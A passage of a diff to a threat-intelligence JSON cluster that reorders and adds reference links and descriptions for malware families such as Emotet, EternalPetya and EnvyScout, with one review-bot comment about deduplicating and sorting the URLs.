+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html",
+ "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
+ "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://cyber.wtf/2022/03/23/what-the-packer/",
+ "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
+ "https://twitter.com/ContiLeaks/status/1498614197202079745",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://www.youtube.com/watch?v=_BLOmClsSpc",
+ "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one",
+ "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
+ "https://twitter.com/eduardfir/status/1461856030292422659",
+ "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/",
+ "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
+ "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html",
+ "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure",
+ "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
+ "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://securelist.com/emotet-modules-and-recent-attacks/106290/",
+ "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/",
+ "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://blog.threatlab.info/malware-analysis-emotet-infection/",
+ "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
+ "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
+ "https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
+ "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
+ "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://twitter.com/Cryptolaemus1/status/1516535343281025032",
+ "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/",
+ "https://github.com/cecio/EMOTET-2020-Reversing",
+ "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf",
+ "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/",
+ "https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html",
+ "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
 "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
- "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware"
+ "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
+ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
+ "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://securelist.com/the-chronicles-of-emotet/99660/",
+ "https://community.riskiq.com/article/2cd1c003",
+ "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/"
 ],
 "synonyms": [
 "Geodo",
@@ -23516,29 +24624,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader",
- "https://attack.mitre.org/groups/G0096",
- "http://www.secureworks.com/research/threat-profiles/gold-burlap",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
 "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
 "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
 "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
 "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://twitter.com/thor_scanner/status/992036762515050496",
- "https://paper.seebug.org/1301/",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html",
- "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://attack.mitre.org/groups/G0096",
 "https://www.mandiant.com/media/12596/download",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick"
+ "https://twitter.com/thor_scanner/status/992036762515050496",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://paper.seebug.org/1301/"
 ],
 "synonyms": [],
 "type": []
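Review bot: The rewritten refs list for win.empire_downloader still carries the same Secureworks profile twice, as `"https://www.secureworks.com/research/threat-profiles/gold-heron"` and `"http://www.secureworks.com/research/threat-profiles/gold-heron"`, and the re-added gold-burlap entry is likewise plain `http://`. Normalising the scheme to https and deduplicating before emitting would collapse these to one entry each and stop consumers from following an unencrypted link that only redirects. The remainder of the hunk is a pure reorder of otherwise unchanged URLs, which suggests the producer iterates an unordered set; sorting refs before serialising would confine future diffs to the lines that actually change. If this cluster is regenerated from upstream Malpedia data, both fixes belong in the generator rather than in hand edits of the JSON.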
@@ -23564,13 +24672,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-union",
 "https://attack.mitre.org/groups/G0011",
- "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
 "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
 ],
 "synonyms": [
@@ -23599,11 +24707,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.entropy",
- "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728",
- "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
 "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -23629,14 +24737,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.envyscout",
- "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
- "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
- "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/",
- "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
 "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine",
 "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
+ "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
 "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
- "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine"
+ "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
+ "https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/",
+ "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf"
 ],
 "synonyms": [
 "ROOTSAW"
@@ -23647,7 +24756,7 @@
 "value": "EnvyScout"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Epsilon is a ransomware-type program. This malware is designed to encrypt the data of infected systems in order to demand payment for decryption.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red",
@@ -23685,16 +24794,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup",
+ "https://laanwj.github.io/2016/09/01/tadaqueos.html",
 "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html",
- "https://laanwj.github.io/2016/09/11/buzzdirection.html",
 "https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
 "https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
- "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
- "https://laanwj.github.io/2016/08/28/feintcloud.html",
- "https://laanwj.github.io/2016/09/01/tadaqueos.html",
+ "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html",
 "https://laanwj.github.io/2016/08/22/blatsting.html",
 "https://laanwj.github.io/2016/09/17/seconddate-cnc.html",
- "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html"
+ "https://laanwj.github.io/2016/08/28/feintcloud.html",
+ "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
+ "https://laanwj.github.io/2016/09/11/buzzdirection.html"
 ],
 "synonyms": [],
 "type": []
@@ -23707,10 +24816,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer",
- "https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer",
+ "https://twitter.com/abuse_ch/status/1565290110572175361",
 "https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/",
- "https://twitter.com/sekoia_io/status/1577222282929311744",
- "https://twitter.com/abuse_ch/status/1565290110572175361"
+ "https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer",
+ "https://twitter.com/sekoia_io/status/1577222282929311744"
 ],
 "synonyms": [],
 "type": []
@@ -23775,8 +24884,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.especter",
- "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html",
- "https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/"
+ "https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/",
+ "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html"
 ],
 "synonyms": [],
 "type": []
@@ -23801,78 +24910,79 @@ "value": "EternalRocks" }, { - "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n", + "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims\u2019 computers, servers, or files preventing them from regaining access until a ransom\u2014usually in Bitcoin\u2014is paid.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://gvnshtn.com/maersk-me-notpetya/", - "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", - "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", - "https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", - "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", - 
"https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "http://www.intezer.com/notpetya-returns-bad-rabbit/", - "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", - "https://securelist.com/from-blackenergy-to-expetr/78937/", - "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", - "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", - "https://www.secureworks.com/research/threat-profiles/iron-viking", - "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", - "https://securelist.com/bad-rabbit-ransomware/82851/", - "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", - "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/", - "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", - "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine", - "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/", - "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", - 
"https://attack.mitre.org/groups/G0034", + "https://www.riskiq.com/blog/labs/badrabbit/", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", + "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://gvnshtn.com/maersk-me-notpetya/", + "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html", "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/", + "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + 
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", + "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", + "https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786", + "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", + "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://securelist.com/schroedingers-petya/78870/", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", + "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", + 
"https://attack.mitre.org/groups/G0034", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/", + "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://istari-global.com/spotlight/the-untold-story-of-notpetya/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back", - "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", - "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", + "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", - 
"https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/", - "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", - "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "https://securelist.com/schroedingers-petya/78870/", - "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", - "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/", - "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", - "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", + "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", + "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html" + "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine", + "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", + 
